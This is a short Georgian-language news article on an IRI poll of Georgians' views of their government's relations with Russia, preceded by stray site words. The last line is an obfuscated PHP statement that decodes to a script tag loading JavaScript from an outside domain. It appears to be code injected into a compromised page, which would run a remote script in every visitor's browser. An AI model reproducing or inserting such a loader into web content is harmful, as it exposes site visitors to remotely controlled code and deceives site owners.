celsiusi
ავერსი საქკაბელი
საერთაშორისო რესპუბლიკურმა ინსტიტუტმა (IRI) საზოგადოებრივი აზრის კვლევა გამოაქვეყნა,სადაც მოსახლეობა ამჟამინდელი ხელისუფლების რუსეთთან ურთიერთობას აფასებს.
 
როგორც გაირკვა, გამოკითხულთა 30% საქართველოს ხელისუფლების რუსეთთან ურთიერთობას გარკვეულწილად დადებითად აფასებს, ძალიან პოზიტიურად კი 12%.
 
საქართველოს ხელისუფლების რუსეთთან ურთიერთობა გარკვეულწილად უარყოფითად 21%-ს მიაჩნია, ძალიან უარყოფითად - 29%, ხოლო პასუხი არ იცის ან არ უპასუხებს 9%. 
 
კვლევა ჩატარდა 2022 წლის 13 სექტემბერი - 2 ოქტომბრის პერიოდში საერთაშორისო რესპუბლიკური ინსტიტუტის კვლევების ცენტრის სახელით, ბალტიის კვლევებისა და გელაპის ორგანიზაციის წარმომადგენლის დოქტორის, რასა ალიშაუსკინეს მიერ. კვლევის საველე სამუშაოები ჩაატარა IPM-მა. მონაცემები შეგროვდა პირისპირ ინტერვიუს გზით. შერჩევა მოიცავდა საარჩევნო ხმის უფლებისა და ასაკის მქონე 1500 რესპონდენტს. მონაცემები შეწონილ იქნა ასაკის, სქესის, რეგიონისა და დასახლების ზომის შესაბამისად. ცდომილების ზღვარი წარმოადგენს +/- 2.5 %, გამოპასუხების მაჩვენებელი - 74 %.
                        
304
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");